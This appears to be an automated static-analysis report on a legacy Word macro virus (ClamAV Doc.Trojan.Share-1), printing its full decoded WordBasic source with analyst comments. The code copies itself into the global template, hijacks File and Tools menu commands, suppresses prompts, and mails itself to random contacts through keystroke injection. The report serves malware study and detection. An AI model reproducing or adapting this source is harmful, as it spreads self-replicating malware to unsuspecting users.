Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 f2ef4214dcb853dc…

MALICIOUS

Office (OLE)

63.5 KB Created: 1998-02-08 15:45:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: d726bc2cf5923340e368b62e115659af SHA-1: 8f17364f012dc8d3d9236127d75ca215d7b8e44b SHA-256: f2ef4214dcb853dc361145c4d9752b6f97b774e3a7c9fe054c0c2f7a6c53f2c0
188 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

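The file contains legacy WordBasic macro markers and an AutoOpen macro, which Word runs when the document is opened. The extracted source shows why this is malicious rather than just macro-enabled: AutoOpen calls SaveAll, which uses SaveMacros to copy nine macros (autoOpen, FileClose, AutoExec, FileExit, FileSave, FileOpen, FileTemplates, ToolsMacro, ShareTheFun) between the open document and the global template (NORMAL.DOT), so the code replicates in both directions. The macros named after the built-in File and Tools commands re-run that copy step whenever those commands are used. The 'ShareTheFun' subroutine, which AutoOpen calls on one of four equally likely random outcomes, attempts to save the document as 'c:\doc1.doc' and then drives Microsoft Mail with simulated keystrokes to send it as an attachment with the text 'You have GOT to read this!', suggesting a phishing or spam distribution method in which the document mails copies of itself. The presence of legacy macro virus markers and the specific actions within the script strongly suggest a malicious document.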

Heuristics 4

  • ClamAV: Doc.Trojan.Share-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Share-1
  • Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUS
    OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    WordBasic.Call "autoOpen.saveall"

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 5885 bytes
SHA-256: ec67eb3632ece3101fd542ca803d7bded553cb6a7cd1202c21607967d945ce23
Detection
ClamAV: Doc.Trojan.Share-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "FileTemplates"

' Analyst note: this module carries the name and description of Word's built-in
' File > Templates command. A macro named after a built-in command runs in place
' of that command, so choosing the menu item executes this body instead.
' The body never opens the Templates dialog; it only re-triggers the
' replication routine and beeps.
Public Sub MAIN()
Attribute MAIN.VB_Description = "Changes the active template and the template options"
Attribute MAIN.VB_ProcData.VB_Invoke_Func = "TemplateProject.FileTemplates.MAIN"
' Invoke the SaveAll routine of the AutoOpen module (macro copy step).
WordBasic.Call "autoOpen.saveall"
' The only visible feedback to the user is a beep.
WordBasic.Beep
End Sub

Attribute VB_Name = "ShareTheFun"

' Analyst note: mail-propagation routine. It saves the open document to a fixed
' path and then drives Microsoft Mail through simulated keystrokes so that the
' saved file is attached to a message addressed by three PickName calls.
' Indicators visible in this body: the file path c:\doc1.doc and the message
' text "You have GOT to read this!".
' Any runtime error jumps to errsending, so failures produce no visible error.
Public Sub MAIN()
On Error GoTo -1: On Error GoTo errsending
    ' Write a copy of the active document to a hard-coded path. Format:=1 is the
    ' document-template format in WordBasic (the format that carries macros in
    ' Word 6/95) - TODO confirm against the WordBasic reference.
    WordBasic.FileSaveAs Name:="c:\doc1.doc", Format:=1
    ' Bring Microsoft Mail to the foreground if it is already running;
    ' otherwise call ExitWindows (by its name, this ends the Windows session).
    If WordBasic.AppIsRunning("Microsoft Mail") Then
        WordBasic.AppActivate "Microsoft Mail"
    Else
        WordBasic.ExitWindows
    End If
    ' "%" is the Alt modifier in SendKeys syntax. The menu these accelerators
    ' map to is not visible here; presumably Alt+M, N starts a new message.
    WordBasic.SendKeys "{enter}"
    WordBasic.SendKeys "%MN"
    
    ' Three recipient selections, each randomised inside PickName.
    PickName
    PickName
    PickName

    ' Tab to a text field and type the lure text, then type the saved file's
    ' path after Alt+A (presumably the attach dialog).
    WordBasic.SendKeys "{TAB}{TAB}You have GOT to read this!{TAB}"
    WordBasic.SendKeys "%Ac:\doc1.doc{ENTER}%o"
    ' Alt+S presumably sends the message; the purpose of the two Alt+V, n
    ' sequences cannot be determined from this listing. The second argument
    ' (-1) is the SendKeys wait flag.
    WordBasic.SendKeys "%S", -1
    WordBasic.SendKeys "%Vn", -1
    WordBasic.SendKeys "%Vn", -1
    ' Close the mail client once the keystrokes have been issued.
    WordBasic.AppClose "Microsoft Mail"
    
errsending:
    ' Clear the active error state and restore default error handling.
    On Error GoTo -1: On Error GoTo 0
End Sub

' Analyst note: helper used by ShareTheFun to choose one recipient at random.
' It types a comma followed by a random capital letter, sends Alt+K, moves down
' a random number of rows and confirms with Enter. All of this is keystroke
' injection into whichever window has focus; errors jump to woops and are
' discarded.
Private Sub PickName()
Dim n$
Dim dn
Dim d
On Error GoTo -1: On Error GoTo woops
    ' Int(Rnd() * 25) yields 0..24, so the character is one of "A".."Y".
    n$ = "," + Chr(WordBasic.Int(Rnd() * 25) + 65)
    ' Alt+K presumably triggers a name lookup in the mail client - not
    ' verifiable from this listing.
    WordBasic.SendKeys n$ + "%K", -1
    ' Press Down between 0 and 5 times to vary which entry is selected.
    dn = WordBasic.Int(Rnd() * 6)
    For d = 1 To dn
        WordBasic.SendKeys "{down}"
    Next d
    WordBasic.SendKeys "{ENTER}", -1
woops:
    ' Clear the active error state and restore default error handling.
    On Error GoTo -1: On Error GoTo 0
End Sub

Attribute VB_Name = "ToolsMacro"

' Analyst note: this module carries the name and description of Word's built-in
' Tools > Macro command, so it runs in place of that command. The body never
' shows the macro dialog, which means a user on an affected installation cannot
' list, edit or delete macros through that menu item; they only hear a beep.
Public Sub MAIN()
Attribute MAIN.VB_Description = "Runs, creates, deletes, or revises a macro"
Attribute MAIN.VB_ProcData.VB_Invoke_Func = "TemplateProject.ToolsMacro.MAIN"
' Invoke the SaveAll routine of the AutoOpen module (macro copy step).
WordBasic.Call "autoOpen.saveall"
' The only visible feedback to the user is a beep.
WordBasic.Beep
End Sub

Attribute VB_Name = "FileClose"

' Analyst note: runs in place of the built-in File > Close command. It first
' re-triggers the macro copy step and then performs the real close, so the
' command still appears to work normally to the user.
Public Sub MAIN()
Attribute MAIN.VB_Description = "Closes all of the windows of the active document"
Attribute MAIN.VB_ProcData.VB_Invoke_Func = "TemplateProject.FileClose.MAIN"
    ' Ignore every error so a failed copy step does not interrupt the close.
    On Error Resume Next
    WordBasic.Call "autoOpen.SaveAll"
    ' Carry out the genuine close operation.
    WordBasic.FileClose
    ' Clear the active error state and restore default error handling.
    On Error GoTo -1: On Error GoTo 0
End Sub

Attribute VB_Name = "FileSave"

' Analyst note: runs in place of the built-in File > Save command. The macro
' copy step is executed before the genuine save, so every save is also an
' opportunity for the macros to be copied.
Public Sub MAIN()
Attribute MAIN.VB_Description = "Saves the active document or template"
Attribute MAIN.VB_ProcData.VB_Invoke_Func = "TemplateProject.FileSave.MAIN"
    ' Ignore every error so a failed copy step does not interrupt the save.
    On Error Resume Next
    WordBasic.Call "autoOpen.SaveAll"
    ' Carry out the genuine save operation.
    WordBasic.FileSave
    ' Clear the active error state and restore default error handling.
    On Error GoTo -1: On Error GoTo 0
End Sub

Attribute VB_Name = "FileOpen"

' Analyst note: runs in place of the built-in File > Open command. It triggers
' the macro copy step and then reproduces the normal Open dialog so the user
' sees the expected behaviour.
Public Sub MAIN()
Attribute MAIN.VB_Description = "Opens an existing document or template"
Attribute MAIN.VB_ProcData.VB_Invoke_Func = "TemplateProject.FileOpen.MAIN"
    ' The copy step is called before the error handler below is installed.
    WordBasic.Call "autoOpen.SaveAll"
    ' From here on, any error (for example the user cancelling the dialog)
    ' jumps to the cancelled label.
    On Error GoTo -1: On Error GoTo cancelled
    ' Build the Open dialog record, fill it with current values, display it,
    ' then open whatever the user selected.
    Dim dlg As Object: Set dlg = WordBasic.DialogRecord.FileOpen(False)
    WordBasic.CurValues.FileOpen dlg
    WordBasic.Dialog.FileOpen dlg
    WordBasic.FileOpen dlg
cancelled:
' Clear the active error state and restore default error handling.
On Error GoTo -1: On Error GoTo 0
End Sub

Attribute VB_Name = "FileExit"

' Analyst note: runs in place of the built-in File > Exit command. The macro
' copy step is executed before Word is allowed to quit.
Public Sub MAIN()
Attribute MAIN.VB_Description = "Quits Microsoft Word and prompts to save the documents"
Attribute MAIN.VB_ProcData.VB_Invoke_Func = "TemplateProject.FileExit.MAIN"
' Save is declared but never assigned before it is passed to FileExit.
Dim Save
    ' Ignore every error so a failed copy step does not block the exit.
    On Error Resume Next
    WordBasic.Call "autoOpen.SaveAll"
    ' Carry out the genuine exit operation.
    WordBasic.FileExit Save
    ' Clear the active error state and restore default error handling.
    On Error GoTo -1: On Error GoTo 0
End Sub

Attribute VB_Name = "AutoOpen"

' Analyst note: entry point that Word runs automatically when the document is
' opened. The description attribute claims to be the "ScanProt" protection
' macro, but nothing in the body scans or disinfects anything: it changes two
' Word settings, runs the macro copy routine (SaveAll) and, on one of four
' equally likely random outcomes, calls the mail routine ShareTheFun.
' The mismatch between description and behaviour presumably serves to mislead
' anyone reading the macro list.
Public Sub MAIN()
Attribute MAIN.VB_Description = "ScanProt macro to install protection macros, disinfect your Normal (Global) template and run the CleanAll macro."
Attribute MAIN.VB_ProcData.VB_Invoke_Func = "TemplateProject.AutoOpen.MAIN"
    ' Any error jumps straight to the exit labels, so failures are silent.
    On Error GoTo -1: On Error GoTo ErrCt
    
    ' GlobalDotPrompt:=0 switches off the prompt that asks before changes to
    ' the global template are saved, so template changes are written silently.
    WordBasic.ToolsOptionsSave GlobalDotPrompt:=0
    ' Argument 0 leaves automatic macros enabled (a non-zero value would
    ' disable them) - TODO confirm against the WordBasic reference.
    WordBasic.DisableAutoMacros 0

    ' Copy the macro set between the document and the global template.
    SaveAll
    WordBasic.StartOfDocument
    ' Int(Rnd() * 4) + 1 yields 1..4; the mail routine runs only when it is 3.
    If WordBasic.Int(Rnd() * 4) + 1 = 3 Then WordBasic.Call "ShareTheFun"

' ErrCt is the error target; bye is not referenced anywhere in this body.
ErrCt:
bye:
    ' Clear the active error state and restore default error handling.
    On Error GoTo -1: On Error GoTo 0

End Sub

' Analyst note: replication driver. It repeats the two setting changes made in
' AutoOpen, asks SaveMacros to copy each of the nine macro names listed below,
' and, when the running macro lives in NORMAL.DOT, re-saves the active
' document with Format:=1. Errors jump to errsaving and are discarded.
' The nine names double as a checklist when inspecting a suspect NORMAL.DOT.
Private Sub SaveAll()
Dim MacroFile$
    On Error GoTo -1: On Error GoTo errsaving
    ' Suppress the save prompt for the global template and keep auto macros on.
    WordBasic.ToolsOptionsSave GlobalDotPrompt:=0
    WordBasic.DisableAutoMacros 0

    ' One copy operation per macro; direction is decided inside SaveMacros.
    SaveMacros "autoOpen"
    SaveMacros "FileClose"
    SaveMacros "AutoExec"
    SaveMacros "FileExit"
    SaveMacros "FileSave"
    SaveMacros "FileOpen"
    SaveMacros "FileTemplates"
    SaveMacros "ToolsMacro"
    SaveMacros "ShareTheFun"

    ' Refresh the document summary information. The dialog record fetched here
    ' is not read again in this routine.
    WordBasic.FileSummaryInfo Update:=1
    Dim dlg As Object: Set dlg = WordBasic.DialogRecord.FileSummaryInfo(False)
    WordBasic.CurValues.FileSummaryInfo dlg

    ' Last 10 characters, upper-cased, of the file that holds the running
    ' macro; "NORMAL.DOT" is exactly 10 characters long.
    MacroFile$ = UCase(WordBasic.[Right$](WordBasic.[MacroFileName$](WordBasic.[MacroName$](0)), 10))

    ' Running from the global template: save the active document with
    ' Format:=1 (the template format in WordBasic - TODO confirm), presumably
    ' so the document can hold the macros that were just copied into it.
    If MacroFile$ = "NORMAL.DOT" Then WordBasic.FileSaveAs Format:=1

    WordBasic.StartOfDocument
errsaving:
    ' Clear the active error state and restore default error handling.
    On Error GoTo -1: On Error GoTo 0
End Sub

' Analyst note: copies one macro, named by M$, between the active document and
' the global template. The direction depends on where the running macro is
' stored: from NORMAL.DOT the copy goes global -> document, otherwise
' document -> global. This pair of directions is what lets the macro set move
' from an opened document into the template and from the template into other
' documents. Errors jump to cantsave and are discarded.
Private Sub SaveMacros(M$)
Dim fileMacro$
Dim globMacro$
Dim MacroFile$
    On Error GoTo -1: On Error GoTo cantsave
    ' Refresh summary information and read it to learn the active document's
    ' directory and file name.
    WordBasic.FileSummaryInfo Update:=1
    Dim dlg As Object: Set dlg = WordBasic.DialogRecord.FileSummaryInfo(False)
    WordBasic.CurValues.FileSummaryInfo dlg

    ' "<directory>\<file>:<macro>" addresses the macro inside the document;
    ' "Global:<macro>" addresses the same macro name in the global template.
    fileMacro$ = dlg.Directory + "\" + dlg.FileName + ":" + M$
    globMacro$ = "Global:" + M$
    ' Last 10 characters, upper-cased, of the file holding the running macro.
    MacroFile$ = UCase(WordBasic.[Right$](WordBasic.[MacroFileName$](WordBasic.[MacroName$](0)), 10))

    ' The third MacroCopy argument (1) is the execute-only flag in WordBasic,
    ' which stops the copied macro from being opened for editing - TODO confirm.
    If MacroFile$ = "NORMAL.DOT" Then
        WordBasic.MacroCopy globMacro$, fileMacro$, 1
    Else
        WordBasic.MacroCopy fileMacro$, globMacro$, 1
    End If
    WordBasic.StartOfDocument
cantsave:
' Clear the active error state and restore default error handling.
On Error GoTo -1: On Error GoTo 0
End Sub

Attribute VB_Name = "AutoExec"

' Analyst note: this AutoExec macro has no executable statements; both lines in
' the body are Rem comments. The name still matters because SaveAll copies
' "AutoExec" along with the other macros, so its presence in a template is one
' of the artefacts left by this sample.
Public Sub MAIN()
    Rem d i n g o a c k
    Rem DisableAutoMacros
End Sub